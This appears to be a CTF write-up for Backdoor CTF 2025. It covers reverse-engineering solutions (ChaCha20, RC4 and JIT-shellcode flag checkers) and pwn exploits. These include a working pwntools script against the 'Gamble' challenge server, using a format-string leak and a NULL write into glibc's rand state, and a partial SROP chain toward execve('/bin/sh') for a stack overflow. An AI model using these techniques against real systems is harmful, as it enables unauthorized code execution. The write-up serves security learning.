Writeups - Backdoor CTF 2025

This post is my writeups for Backdooor CTF 2025 (14 challenges except WEB category) :))

Reverse Engineering

Where code

Description

Another flag checker, eh? But the code is beyond my understanding. It makes my head spin! There's just too many jumps!

Analysis

Check the main flow of the program: flag checking

unsigned __int64 sub_186A()
{
    __int64 v0; // rax
    const void *v1; // rax
    size_t n; // [rsp+8h] [rbp-68h]
    char v4[32]; // [rsp+10h] [rbp-60h] BYREF
    __int64 dest[4]; // [rsp+30h] [rbp-40h] BYREF
    __int16 v6; // [rsp+50h] [rbp-20h]
    unsigned __int64 v7; // [rsp+58h] [rbp-18h]

    v7 = __readfsqword(0x28u);
    std::string::basic_string(v4);
    std::operator<<<std::char_traits<char>>(&std::cout, "Enter the flag: ");
    std::getline<char,std::char_traits<char>,std::allocator<char>>(&std::cin, v4);
    memset(dest, 0, sizeof(dest));
    v6 = 0;
    if ( (unsigned __int64)std::string::length(v4) > 0x21 )
    {
        v0 = 0x22LL;
    }
    else
    {
        v0 = std::string::length(v4);
    }

    n = v0;
    v1 = (const void *)std::string::c_str(v4);
    memcpy(dest, v1, n);
    sub_1592(dest, &unk_4280, 0x22LL);
    std::string::~string(v4);
    return v7 - __readfsqword(0x28u);
}

dest + v6 is a 34-byte buffer on the stack.

Your input (up to 34 bytes) is copied into dest, zero-padded.

Then sub_1592(dest, &unk_4280, 34) is called.

unk_4280 is some global buffer; the real check is likely elsewhere (e.g. later memcmp(&unk_4280, EXPECTED, 34) or vice versa). For solving we just need to understand sub_1592.

Check sub_1592 (Chacha20 cipher)

unsigned __int64 __fastcall sub_1592(__int64 a1, __int64 a2, unsigned __int64 a3)
{
    unsigned __int64 v3; // rax
    int i; // [rsp+28h] [rbp-B8h]
    int j; // [rsp+2Ch] [rbp-B4h]
    unsigned __int64 k; // [rsp+30h] [rbp-B0h]
    unsigned __int64 m; // [rsp+38h] [rbp-A8h]
    int v10[12]; // [rsp+50h] [rbp-90h] BYREF
    int v11; // [rsp+80h] [rbp-60h]
    char v12[72]; // [rsp+90h] [rbp-50h] BYREF
    unsigned __int64 v13; // [rsp+D8h] [rbp-8h]

    v13 = __readfsqword(0x28u);
    qmemcpy(v10, "expand 32-byte k", 0x10);
    for ( i = 0; i <= 7; ++i )
    {
        v10[i + 4] = (byte_2080[4 * i + 2] << 0x10) | (byte_2080[4 * i + 1] << 8) | byte_2080[4 * i] | (byte_2080[4 * i + 3] << 0x18);
    }

    v11 = 1;
    for ( j = 0; j <= 2; ++j )
    {
        v10[j + 0xD] = (byte_20A0[4 * j + 2] << 0x10) | (byte_20A0[4 * j + 1] << 8) | byte_20A0[4 * j] | (byte_20A0[4 * j + 3] << 0x18);
    }

    for ( k = 0LL; k < a3; k += v3 )
    {
        sub_13A4(v10, v12);
        ++v11;
        v3 = a3 - k;
        if ( a3 - k > 0x40 )
        {
            v3 = 0x40LL;
        }

        for ( m = 0LL; m < v3; ++m )
        {
            *(_BYTE *)(m + k + a2) = v12[m] ^ *(_BYTE *)(m + k + a1);
        }
    }

    return v13 - __readfsqword(0x28u);
}

So:

• a1 = input buffer
• a2 = output buffer
• a3 = length

sub_13A4 generates a 64-byte block from state v10.

*(a2 + offset) = keystream_byte ^ *(a1 + offset)

That's exactly how ChaCha20 works: keystream ⊕ plaintext → ciphertext.

The constants give it away:

qmemcpy(v10, "expand 32-byte k", 16) is the ChaCha constant.

sub_1285:

__int64 __fastcall sub_1285(_DWORD *a1, _DWORD *a2, _DWORD *a3, _DWORD *a4)
{
    __int64 result; // rax

    *a1 += *a2;
    *a4 ^= *a1;
    *a4 = sub_1269((unsigned int)*a4, 0x10LL);
    *a3 += *a4;
    *a2 ^= *a3;
    *a2 = sub_1269((unsigned int)*a2, 0xCLL);
    *a1 += *a2;
    *a4 ^= *a1;
    *a4 = sub_1269((unsigned int)*a4, 8LL);
    *a3 += *a4;
    *a2 ^= *a3;
    result = sub_1269((unsigned int)*a2, 7LL);
    *a2 = result;
    return result;
}

is a standard ChaCha quarter-round.

So sub_13A4 is "ChaCha20 block function" and sub_1592 is the ChaCha20 XOR loop.

The hard-coded key & nonce:

byte_2080 db 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh, 0Fh

byte_20A0 db 7 dup(0), 4Ah, 4 dup(0)

byte_2080 is a 32-byte key; only pasted the start, but the pattern is clearly 0x00, 0x01, ... 0x1F.

byte_20A0 is 12 bytes: 00 00 00 00 00 00 00 00 4A 00 00 00 00

That's a 96-bit nonce: words are [0, 0, 0x4A] in little-endian.

Counter starts at 1.

So the keystream for the first block (counter = 1) is:

key   = bytes(range(32))                    # 00 01 02 ... 1f
nonce = b'\x00'*7 + b'\x4a' + b'\x00'*4     # 00...00 4a 00 00 00 00
counter = 1

And first 34 bytes of keystream:

22 4f 51 f3 40 1b d9 e1 2f de 27 6f b8 63 1d ed
8c 13 1f 82 3d 2c 06 e2 7e 4f ca ec 9e f3 cf 78
8a 3b

Relation between flag and unk_4280

From the call:

sub_1592(dest, &unk_4280, 34);

get (for 0 ≤ i < 34):

unk_4280[i] = keystream[i] ^ dest[i]

where dest is your (zero-padded) input flag.

That means for the correct flag F and the corresponding stored bytes C (what the program uses in its comparison), the relationship is:

C[i] = F[i] ⊕ KS[i]
⇒ F[i] = C[i] ⊕ KS[i]

So once know the 34 bytes of ciphertext (C), recovering the flag is trivial XOR with the keystream.

This script re-implements the ChaCha20 block exactly as in the binary and recovers the flag from the 34-byte ciphertext.

From the .rodata section, the 34-byte array the checker uses is at offset 0x2040:

44 23 30 94 3b 72 97 d0 70 b8 06 01 d1 3c 50 84
e2 22 40 ef 0d 02 28 cc 4f 10 ee 89 ad ac b6 37
ff 46

Solve

from typing import List

def rotl32(x, n):
    return ((x << n) & 0xffffffff) | ((x & 0xffffffff) >> (32 - n))

def quarter_round(a, b, c, d):
    a = (a + b) & 0xffffffff; d ^= a; d = rotl32(d, 16)
    c = (c + d) & 0xffffffff; b ^= c; b = rotl32(b, 12)
    a = (a + b) & 0xffffffff; d ^= a; d = rotl32(d, 8)
    c = (c + d) & 0xffffffff; b ^= c; b = rotl32(b, 7)
    return a, b, c, d

def chacha_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    assert len(key) == 32
    assert len(nonce) == 12

    def u32_le(b: bytes) -> int:
        return int.from_bytes(b, "little")

    state = [
        u32_le(b"expa"),
        u32_le(b"nd 3"),
        u32_le(b"2-by"),
        u32_le(b"te k"),
    ]
    for i in range(8):
        state.append(int.from_bytes(key[4*i:4*i+4], "little"))
    state.append(counter)
    for i in range(3):
        state.append(int.from_bytes(nonce[4*i:4*i+4], "little"))

    working = state.copy()
    for _ in range(10):  # 20 rounds
        # column
        working[0], working[4], working[8], working[12] = quarter_round(working[0], working[4], working[8], working[12])
        working[1], working[5], working[9], working[13] = quarter_round(working[1], working[5], working[9], working[13])
        working[2], working[6], working[10], working[14] = quarter_round(working[2], working[6], working[10], working[14])
        working[3], working[7], working[11], working[15] = quarter_round(working[3], working[7], working[11], working[15])
        # diagonal
        working[0], working[5], working[10], working[15] = quarter_round(working[0], working[5], working[10], working[15])
        working[1], working[6], working[11], working[12] = quarter_round(working[1], working[6], working[11], working[12])
        working[2], working[7], working[8],  working[13] = quarter_round(working[2], working[7], working[8],  working[13])
        working[3], working[4], working[9],  working[14] = quarter_round(working[3], working[4], working[9],  working[14])

    out = [(a + b) & 0xffffffff for a, b in zip(state, working)]
    return b"".join(x.to_bytes(4, "little") for x in out)

key   = bytes(range(32))  # 00 01 02 ... 1f
nonce = bytes.fromhex("000000000000004a00000000")
enc   = bytes.fromhex(
    "44 23 30 94 3b 72 97 d0 70 b8 06 01 d1 3c 50 84"
    " e2 22 40 ef 0d 02 28 cc 4f 10 ee 89 ad ac b6 37"
    " ff 46"
)

ks = chacha_block(key, 1, nonce)   # counter = 1
flag = bytes(e ^ k for e, k in zip(enc, ks[:len(enc)]))
print(flag)
print(flag.decode())

FLAG: flag{iN1_f!ni_Min1_m0...1_$e3_yOu}

To jmp or not jmp

Description

Another flag checker, eh? But the code is beyond my understanding. It makes my head spin! There's just too many jumps!

Analysis

Information

challenge: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3dd27df153c863f59a03dcd6cbbe810abda047bf, for GNU/Linux 3.2.0, stripped

Initial Observations

• The binary uses libstdc++ (evident from functions: _ZSt3cin, _ZSt4cout, std::getline in PLT)
• Contains many jn/jne jumps to illogical addresses - classic control flow obfuscation
• String analysis in IDA Pro reveals an obfuscated string at 0x2020

.rodata:0000000000002020 sza1a9a1fsR db '!a1 a&',0Dh,'9a+',0Dh,' 1fsR'

Key Recovery

The binary contains XOR-based key obfuscation. Tracing the code:

.text:000000000000134C         lea     rdx, sza1a9a1fsR        ; "!a1 a&\r9a+\r 1fsR"
.text:0000000000001353         mov     rax, [rbp-8]
.text:0000000000001357         add     rax, rdx
.text:000000000000135A         movzx   eax, byte ptr [rax]
.text:000000000000135D         xor     eax, 52h

The string sza1a9a1fsR is XORed with 0x52 to reveal the actual key:

b'!a1 a&\r9a+\r 1fsR' ^ 0x52 = b's3cr3t_k3y_rc4!\x00'

RC4 Implementation Analysis

Encrypted Data Location

• At 0x2040: 66 bytes of high-entropy data (ciphertext)
• At 0x2088: length value 0x42 (66 decimal)
• At 0x2080: magic value 0xf1ed

Algorithm Confirmation

The binary contains a standard RC4 implementation starting at 0x12e6:

1. Key Scheduling Algorithm (KSA): Initializes 256-byte S-box at 0x4280
2. Pseudo-Random Generation Algorithm (PRGA): Generates keystream bytes at 0x1413-0x14ff

Key structure identified:

• RC4 key: "s3cr3t_k3y_rc4!" (15 bytes)
• Ciphertext: 66 bytes at 0x2040

Solve

Decryption Script

def rc4_ksa(key: bytes):
    S = list(range(256))
    j = 0
    klen = len(key)
    for i in range(256):
        j = (j + S[i] + key[i % klen]) & 0xff
        S[i], S[j] = S[j], S[i]
    return S

def rc4_prga(S, n):
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) & 0xff]
        out.append(K)
    return bytes(out)

def rc4_decrypt(key, cipher):
    S = rc4_ksa(key)
    ks = rc4_prga(S, len(cipher))
    return bytes(c ^ k for c, k in zip(cipher, ks))

Flag Extraction

# Extract from binary
key_full = b's3cr3t_k3y_rc4!\x00'
key = key_full[:15]               # First 15 bytes as the key
cipher = ro_bytes[0x40:0x40+66]   # 66 bytes at offset 0x40

# Decrypt
plain = rc4_decrypt(key, cipher)
print(plain.decode())

Flag: flag{$t0p_JUmp1n9_@R0uNd_1!k3_A_F00l_4nd_gib3_M3333_7H@t_f14g!!!!}

Vault

Description

I heard you are a master at breaking vaults, try to break this one..

Analysis

Based on the challenge name "Vault", we can guess this is a binary related to shellcode. When opening the file with IDA Pro, we can see the main program flow as follows:

1. Quick recon

file chal
# ELF 64-bit LSB pie executable, x86-64, stripped

readelf -h chal | grep 'Entry point'
# Entry point: 0x1160

readelf -S chal | grep '\.data'
# .data: vaddr 0x4000, file offset 0x3000, size 0x1380

Useful imported functions from the PLT:

• printf, puts, __isoc23_scanf, strcspn
• mmap, munmap, perror, exit

So we immediately suspect some dynamic code generation (JIT) via mmap.

main – input & length check

Disassembling around 0x1460 shows the main function:

• Prints the intro string (vault story) and a prompt.
• Reads the password into a 0x90‑byte stack buffer via __isoc23_scanf.
• Uses strcspn to strip the trailing newline and stores the length in [rbp-0x98].
• If length != 0x35 (53), it prints an error message and exits.
• If length == 0x35, it calls the verifier at 0x1379, passing the pointer to string in rdi.

So we know the only accepted password is exactly 53 bytes long.

The JIT builder (function at 0x1249)

The verifier calls a helper at 0x1249 with edi = index for each character position.

Pseudocode for 0x1249:

void *build_shellcode(int idx) {
    // mmap RWX 0x8000 bytes
    void *buf = mmap(NULL, 0x8000, PROT_READ|PROT_WRITE|PROT_EXEC,
                     MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); exit(-1); }

    // local tmp[57]
    for (int j = 0; j <= 0x38; j++) {
        // index into a big byte table at .data+0x20 (vaddr 0x4020)
        size_t off = idx * 57 + j;
        uint8_t b = byte_table_4020[off];

        // XOR with a dword from 0x4C00 and keep only the low byte
        uint32_t key = dword_table_4C00[idx];
        tmp[j] = (uint8_t)(b ^ (uint8_t)key);
    }

    // then splat tmp[0..56] into `buf` as overlapping qwords,
    // resulting in a 57‑byte chunk of executable shellcode.
    // Finally return buf;
}

So for each character position i, the program builds a custom 57‑byte piece of code and returns a function pointer to it.

The verifier (function at 0x1379)

The function at 0x1379 loops over every character of input string:

int check(const char *s) {
    int i = 0;
    for (;;) {
        unsigned char ch = s[i];
        if (!ch) break;            // end of string

        void *code = build_shellcode(i);  // 0x1249
        uint32_t *pattern = &table_bits_4CE0[i * 8];
        uint32_t key      = dword_table_4C00[i];

        int ok = jit_func(ch, key, 0, 0, pattern); // call via function pointer
        if (ok != 1) {
            puts("Wrong password");
            exit(-1);
        }
        munmap(code, 0x8000);
        i++;
    }
    puts("Correct password");
    return 0;
}

The interesting part is what jit_func actually does with (ch, key, pattern).

Reversing the shellcode

We can reconstruct the shellcode bytes for a given index entirely in Python by mimicking the loop in 0x1249 (that’s exactly what the solver does internally), but to understand the logic we only need one instance, say for idx = 0.

Once we build those 57 bytes, we disassemble them as raw x86‑64:

# code0.bin contains the first 80 bytes of the mmap'ed shellcode for index 0
objdump -D -b binary -m i386:x86-64 code0.bin

The disassembly (cleaned up) is:

mov  ecx, 4              ; start checking from bit 4
xor  rdi, rsi            ; rdi = ch ^ key
loop_start:
    cmp  rdx, 8
    sete al
    je   done_success    ; if we checked 8 bits, return 1

    mov  rax, rdi
    shr  rax, cl         ; shift our value by cl bits
    and  rax, 1          ; keep only the lowest bit
    mov  rbx, rax

    movzbq rax, [r8 + rdx*4]  ; pattern[rdx], 8 entries of 0/1
    cmp    rax, rbx
    sete   al
    jne    done_fail     ; mismatch -> return 0

    inc  rdx             ; next pattern entry
    inc  rcx             ; next bit of v
    and  rcx, 7          ; wrap around mod 8
    jmp  loop_start

done_fail:
    ret
done_success:
    ret

Call-site register setup (from 0x1379):

• rdi = sign-extended input character
• rsi = 32‑bit key from table at 0x4C00
• rdx = 0
• rcx = 0
• r8 = pointer into the table at 0x4CE0 (8 dwords per character index)

So the abstract logic of the shellcode is:

int jit(int ch, uint32_t key, int zero1, int zero2, uint32_t *pattern) {
    unsigned long v = (unsigned long)ch ^ (unsigned long)key;
    int bit = 4;       // start from bit 4
    int k   = 0;       // pattern index

    for (;;) {
        if (k == 8) return 1;  // all 8 bits matched

        unsigned long actual = (v >> bit) & 1;
        unsigned long expected = pattern[k] & 1;  // 8 entries of 0 or 1

        if (actual != expected) return 0;

        k++;
        bit = (bit + 1) & 7;  // 4,5,6,7,0,1,2,3
    }
}

Understanding the data tables

From the disassembly:

• Byte table at 0x4020 (vaddr) in .data – used only to construct the shellcode.
• Dword key table at 0x4C00 – 64 entries of 32‑bit keys.
• Dword bit-pattern table at 0x4CE0 – for each character index i, 8 x 32‑bit integers (0 or 1), i.e. 32 bytes per index.

We don’t actually need the byte table at 0x4020 to solve the challenge; it’s just an obfuscation layer for the JIT. Once we know what the shellcode does, only 0x4C00 and 0x4CE0 matter.

Let:

v_i = password[i] ^ (key[i] & 0xFF);

and let pattern[i][k] be the 8 dwords at 0x4CE0 + i*32 + k*4, each equal to 0 or 1.

The shellcode checks:

• pattern[i][0] == bit4(v_i)
• pattern[i][1] == bit5(v_i)
• pattern[i][2] == bit6(v_i)
• pattern[i][3] == bit7(v_i)
• pattern[i][4] == bit0(v_i)
• pattern[i][5] == bit1(v_i)
• pattern[i][6] == bit2(v_i)
• pattern[i][7] == bit3(v_i)

So each index i has an 8‑bit pattern that exactly encodes the bits of v_i.

Inverting the check

For each position i:

1. Read the 8 dwords from 0x4CE0: bits[k] = (raw_bits[32*i + 4*k] & 1) for k = 0..7.

2. Reconstruct v_i from those bits:

   v = 0
   # bits[0..3] -> bits 4..7
   for bitpos in range(4, 8):
       if bits[bitpos - 4]:
           v |= (1 << bitpos)
   # bits[4..7] -> bits 0..3
   for bitpos in range(0, 4):
       if bits[bitpos + 4]:
           v |= (1 << bitpos)
   

3. Recover the actual password byte as:

   ch = v ^ (key[i] & 0xFF)
   

Doing this for all 53 positions yields a 53‑byte password.

The provided solver (solve_chal.py) implements exactly this logic directly on the chal binary.

Solve

#!/usr/bin/env python3
import struct

FILENAME = "chal"   # change if filename is different

def main():
    with open(FILENAME, "rb") as f:
        data = f.read()

    # According to readelf: .data has virtual addr 0x4000 and file offset 0x3000
    off_data = 0x3000

    # Offsets in .data obtained from disassembly:
    # 0x4020: byte table used to build shellcode (57 bytes / index, 64 indexes)
    # 0x4c00: dword key table (4 bytes / index, 64 indexes)
    # 0x4ce0: bit pattern table (32 bytes / index, 64 indexes)
    off_4020 = off_data + 0x20   # 0x4020
    off_4c00 = off_data + 0xC00  # 0x4C00
    off_4ce0 = off_data + 0xCE0  # 0x4CE0

    n_slots = 64
    raw_shell = data[off_4020: off_4020 + 57 * n_slots]
    raw_keys  = data[off_4c00: off_4c00 + 4  * n_slots]
    raw_bits  = data[off_4ce0: off_4ce0 + 32 * n_slots]

    # key[i] is a dword, but shellcode only uses the low byte
    keys = [struct.unpack_from("<I", raw_keys, 4 * i)[0] for i in range(n_slots)]

    def recover_char(i: int) -> int:
        """
        Based on shellcode:
          v = ch ^ key_byte
          then check 8 bits of v in bitpos order: 4,5,6,7,0,1,2,3
          expected bit values are taken from table 4ce0, each index occupies 32 bytes,
          but only uses 8 bytes at offset 0,4,8,...,28 (1 byte each time).
        We reverse: from 8 expected bits -> v -> ch.
        """
        key_byte = keys[i] & 0xFF

        # Get 8 bits (actually 8 bytes of 0/1) for index i
        bits = [(raw_bits[32 * i + 4 * t] & 1) for t in range(8)]

        # Rebuild v = ch ^ key_byte from those bits.
        # mapping:
        #  t=0..3  -> bitpos 4..7
        #  t=4..7  -> bitpos 0..3
        v = 0
        # bit 4..7
        for bitpos in range(4, 8):
            t = bitpos - 4
            if bits[t]:
                v |= (1 << bitpos)
        # bit 0..3
        for bitpos in range(0, 4):
            t = bitpos + 4
            if bits[t]:
                v |= (1 << bitpos)

        ch = v ^ key_byte
        return ch

    # main() in binary requires length = 0x35 (53) before calling the check function
    length = 0x35
    secret = bytes(recover_char(i) for i in range(length))

    # Print results
    print("Raw password bytes:", list(secret))
    print("Raw password hex  :", secret.hex())
    print("Printable preview :", ''.join(chr(c) if 32 <= c < 127 else '.' for c in secret))

    # A reasonable flag format: flag{<password_hex>}
    print("\nCandidate flag (password hex-encoded):")
    print(f"flag{{{secret.hex()}}}")

if __name__ == "__main__":
    main()

FLAG: flag{hm_she11c0d3_v4u17_cr4ck1ng_4r3_t0ugh_r1gh7!!??}

Pwnable

Gamble

Description

My friends and I planned a trip to Gokarna and heard about a famous casino with a machine that almost never lets anyone win, only the truly lucky. I’ve replicated it. Let’s see if you are one of them!

In this challenge, we are given only the binary with a Dockerfile. Libc is important in this challenge, so we need to build the docker image and get libc there

Analysis

• checksec: Every mitigations are used

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

• Reverse engineering: The challenge allows us to use the following functionalities

  1. The login() function allows us to create a new user (if has not existed), or simply switch to an already created user
  2. The bet() function allows us to place an arbitrary bet amount (with each user can bet only once)
  3. The gamble() function calls random 5 times, with the results in the range from 0 to 0xfffffffffffff000. If the result falls under 4094, we will get the flag via win()

• Vulnerabilities: There are two vulnerabilities in this binary

  1. Format string vulnerability via stack overflow: The printf() function at address 0x1998 uses a program defined string as the format string. However, we can overwrite the first 6 bytes of the format string, because the program allows us to write 16 bytes to a 10-byte buffer right before it.
  2. Arbitrary NULL vulnerability: In the gamble() function, if we lose, it sets the current player balance to zero. However, it does a double dereference (at 0x1BD8), thus instead of zeroing the balance, it sets the address pointed to by the current balance to be 0. As the balance is user input, we can achieve arbitrary NULL.

Exploitation

• The first thing that we can achive using the 6-byte format string is to leak a variety of addresses (including libc, elf, and stack). However, as I only use libc address in the next steps, I only leak it.

• The next step is to somehow trick rand() to return a small value, as the current set up gives us a winning chance of about 1/500000. As we know the libc address and have arbitrary NULL primitive, I decided to dive into libc source code to see how random numbers are generated by rand(). The source code is available at https://elixir.bootlin.com/glibc/glibc-2.39/source/stdlib/random_r.c#L353

• The rand() function will eventually call __random_r(), which is indeed quite short

int
__random_r (struct random_data *buf, int32_t *result)
{
  int32_t *state;

  if (buf == NULL || result == NULL)
    goto fail;

  state = buf->state;

  if (buf->rand_type == TYPE_0)
    {
      int32_t val = ((state[0] * 1103515245U) + 12345U) & 0x7fffffff;
      state[0] = val;
      *result = val;
    }
  else
    {
      int32_t *fptr = buf->fptr;
      int32_t *rptr = buf->rptr;
      int32_t *end_ptr = buf->end_ptr;
      uint32_t val;

      val = *fptr += (uint32_t) *rptr;
      /* Chucking least random bit.  */
      *result = val >> 1;
      ++fptr;
      if (fptr >= end_ptr)
	{
	  fptr = state;
	  ++rptr;
	}
      else
	{
	  ++rptr;
	  if (rptr >= end_ptr)
	    rptr = state;
	}
      buf->fptr = fptr;
      buf->rptr = rptr;
    }
  return 0;

 fail:
  __set_errno (EINVAL);
  return -1;
}

The struct random_data is as follows

struct random_data
  {
    int32_t *fptr;		/* Front pointer.  */
    int32_t *rptr;		/* Rear pointer.  */
    int32_t *state;		/* Array of state values.  */
    int rand_type;		/* Type of random number generator.  */
    int rand_deg;		/* Degree of random number generator.  */
    int rand_sep;		/* Distance between front and rear.  */
    int32_t *end_ptr;		/* Pointer behind state table.  */
  };

• In short, the random_data *buf structure is initialized in libc, with the rand_type being 3. It can be seen via debugging. So, the rand() function of the binary will take the path

int32_t *fptr = buf->fptr;
int32_t *rptr = buf->rptr;
int32_t *end_ptr = buf->end_ptr;
uint32_t val;

val = *fptr += (uint32_t) *rptr;
/* Chucking least random bit.  */
*result = val >> 1;
++fptr;
if (fptr >= end_ptr)
    {
        fptr = state;
        ++rptr;
    }
else
    {
        ++rptr;
        if (rptr >= end_ptr)
        rptr = state;
    }
buf->fptr = fptr;
buf->rptr = rptr;

• The generation of random number is simply: Maintain two pointers fptr and rptr, which point to a libc region between buf->state and buf->end_ptr (it can also be observed by debugging). fptr or rptr is added up after every call for random. If they exceed the end_ptr, they are set back to state, which is kind of a base pointer. By debugging, we can see that the region is full of random numbers, and the region is (approximately) from offset 0x203020 to 0x2030a0 in libc. An important thing to note is that this region NEVER changes after initialization. So, as the result is (*fptr + *rptr) >> 1, then if we can nullify the region that fptr and rptr point to, the rand() function will always return 0.

• We can debug and see exactly which place that we need to null out to achieve that (for example set a break at a rand() and see which two values are used in that call, and then set it to 0). However, as we are allowed 8 bet times (2 reserved for leaking libc and the final call for flag), I simply null out the first 8 QWORDS of that region. Luckily, it is enough to reach win(). Also, I try to null out the end_ptr, so that fptr and rptr goes back to state, which is the start of the region, and we have nulled out several QWORDS there.

from pwn import *
context.log_level = 'debug'

p = remote('remote.infoseciitr.in', 8004)
def login(usr_id, usr_name, amount):
    p.sendlineafter(b'>', b'1')
    p.sendlineafter(b': ', usr_id)
    p.sendlineafter(b': ', usr_name)
    p.sendlineafter(b': ', amount)

def leak_libc(usr_id):
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b': ', usr_id)
    p.sendlineafter(b': ', b'A' * 10 + b'%llx')
    libc_leak = int('0x' + p.recv(12).decode(), 16)
    return libc_leak - 0x203963

def arbitrary_null(usr_id, addr):
    login(usr_id, b'a', str(addr // 8).encode())
    leak_libc(usr_id)
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b': ', usr_id)
    for i in range(5):
        p.recvuntil(b'gamble...')
        p.sendline(b'')
    
login(b'0', b'a', b'1')
libc_base = leak_libc(b'0')
log.info(f"Libc_base: {hex(libc_base)}")

arbitrary_null(b'1', libc_base + 0x203020)
arbitrary_null(b'2', libc_base + 0x203028)
arbitrary_null(b'3', libc_base + 0x203030)
arbitrary_null(b'4', libc_base + 0x203038)
arbitrary_null(b'5', libc_base + 0x203040)
arbitrary_null(b'6', libc_base + 0x203048)
arbitrary_null(b'7', libc_base + 0x203050)

arbitrary_null(b'8', libc_base + 0x2036c8) ### Null end_ptr (may not be necessary)
arbitrary_null(b'9', libc_base + 0x203058) ### Final to get flag
p.interactive()

Devil's Convergence

BOOM.

Analysis

High‑Level Design of the Binary

The program is themed around devils from Chainsaw Man. The flow:

1. Control Devil (Makima) – first interaction
2. War Devil (Yoru) – second interaction
3. Bomb Devil (Reze) – final interaction where we gain RIP control

There is also a global 8‑byte variable we’ll call contract_seal, which is crucial. It is initialized at startup via relocations to hold the address of system in libc.

contract_seal

Decompiled/annotated:

uint64_t contract_seal;  // global

void initialize(void) {
    // ... some story printing ...
    // via a GLOB_DAT relocation, contract_seal is set to &system
    // in the GOT/PLT resolution process.
}

So at runtime:

contract_seal == (uint64_t)system@libc

This is the secret key used by all three devils.

Control Devil: Low 4 Bytes of system

The Control Devil function (Makima) roughly looks like:

void control_devils_contract(void) {
    char buf[4];

    puts("[CONTROL DEVIL] Submit to her control:");
    read(0, buf, 4);                         // our input

    uint8_t *seal = (uint8_t *)&contract_seal;
    for (int i = 0; i < 4; i++) {
        buf[i] ^= seal[i];                   // XOR with first 4 bytes
    }

    printf("[CONTROL DEVIL] Your dominated essence: ");
    write(1, buf, 4);
    putchar('\n');
}

Crucially:

output[i] = input[i] ^ seal[i]

So if we choose a known input (e.g. "AAAA"), then:

seal[i] = output[i] ^ input[i]

This gives us the first 4 bytes of contract_seal.

War Devil: High 4 Bytes of system

The War Devil function (Yoru) is similar, but uses the next 4 bytes of contract_seal:

void war_devils_prophecy(void) {
    char buf[4];

    puts("[WAR DEVIL] Offer your tribute to War:");
    read(0, buf, 4);                         // our input

    uint8_t *seal = (uint8_t *)&contract_seal;
    for (int i = 0; i < 4; i++) {
        buf[i] ^= seal[i+4];                 // XOR with bytes 4..7
    }

    printf("[WAR DEVIL] Your war essence: ");
    write(1, buf, 4);
    putchar('\n');
}

Again:

output[i] = input[i] ^ seal[i+4]
=> seal[i+4] = output[i] ^ input[i]

Picking a known input like "BBBB", we recover the high 4 bytes of contract_seal.

Combining both:

key0 = output0 ^ b"AAAA"
key1 = output1 ^ b"BBBB"
key  = key0 + key1   # 8 bytes total
system_leak = u64(key)  # little-endian decode

Now we have the exact runtime address of system in the remote libc:

system_leak = libc_base + libc.sym['system']
=> libc_base = system_leak - libc.sym['system']

Bomb Devil: Stack Overflow with XOR Obfuscation

The final devil, Bomb Devil (Reze), has the actual memory corruption bug.

Approximate decompilation:

void bomb_devils_contract(void) {
    char volatile_mixture[0x200];   // actually allocated on heap via malloc
    char buffer[0x50];              // local stack buffer

    uint8_t *seal = (uint8_t *)&contract_seal;

    puts("[BOMB DEVIL] Infuse your energy into the contract:");

    char *ptr = malloc(0x200);
    read(0, ptr, 0x200);            // read 512 bytes from user

    for (int i = 0; i < 0x200; i++) {
        ptr[i] ^= seal[i % 8];      // XOR each byte with repeating key
    }

    memcpy(buffer, ptr, 0x200);     // BUG: copies 0x200 into 0x50 buffer
    free(ptr);

    // function returns, using corrupted stack
}

The problem:

• buffer is only 0x50 bytes.
• memcpy copies 0x200 bytes into it.
• This overflows into saved RBP and then saved RIP.

Stack layout:

[buffer, size 0x50]           ; at [rbp-0x50]
[saved RBP]                   ; at [rbp]
[saved RIP]                   ; at [rbp+8]

So from the start of buffer to saved RIP is:

offset = 0x50 (buffer) + 0x08 (saved RBP) = 0x58

Whatever ends up at buffer[0x58:0x60] becomes the new RIP.

###1. The XOR twist

We don’t control buffer directly. Data flows as:

our_input -> ptr (heap) --XOR with seal--> ptr -> memcpy -> buffer (stack)

So:

buffer[i] = our_input[i] ^ seal[i % 8]

If we want a desired byte D[i] on the stack, we need to send:

our_input[i] = D[i] ^ seal[i % 8]

Since we already recovered all 8 bytes of contract_seal (which is system), we know the XOR key:

key = p64(system_leak)  # 8-byte repeating key

Now we can pre‑XOR a desired stack image to get the correct input payload.

ROP vs SROP – Why We Use Sigreturn

We want to eventually call:

system("/bin/sh");

or perform an equivalent execve("/bin/sh", 0, 0).

Given ASLR and PIE, we only know libc base (from the system leak). We must build a ROP chain inside libc.

Looking for a classic ROP chain (pop rdi; ret → system("/bin/sh")) is hard in this libc/gadget set and/or in the challenge’s intended solution. Instead, we use SROP (Sigreturn-Oriented Programming), which works well when:

• We know libc base.
• We can find:
  • A syscall instruction.
  • A gadget to set RAX = 15 (the rt_sigreturn syscall number).
• We can build a valid sigreturn frame on the stack.

Useful libc gadgets

In this provided libc.so.6 we can find:

• A misaligned gadget that acts as pop rax; ret at offset 0xDD237:

  libc_base + 0xDD237  =>  pop rax; ret
  

• A syscall instruction at offset 0x288B5:

  libc_base + 0x288B5  =>  syscall
  

• The string "/bin/sh" at offset found by searching:

  BINSH_OFF = next(libc.search(b"/bin/sh"))
  # e.g. 0x1cb42f
  

So at runtime:

pop_rax_ret = libc_base + 0xDD237
syscall     = libc_base + 0x288B5
binsh       = libc_base + BINSH_OFF

SROP idea

We craft an ROP sequence on the stack:

1. Overwrite RIP with pop_rax_ret

2. Next 8 bytes: 0xf (the syscall number for rt_sigreturn)

3. Next 8 bytes: syscall (the gadget that will invoke syscall)

4. Immediately after that, in memory, we place a SigreturnFrame structure that sets:

   rax = 59                # SYS_execve
   rdi = binsh             # pointer to "/bin/sh"
   rsi = 0
   rdx = 0
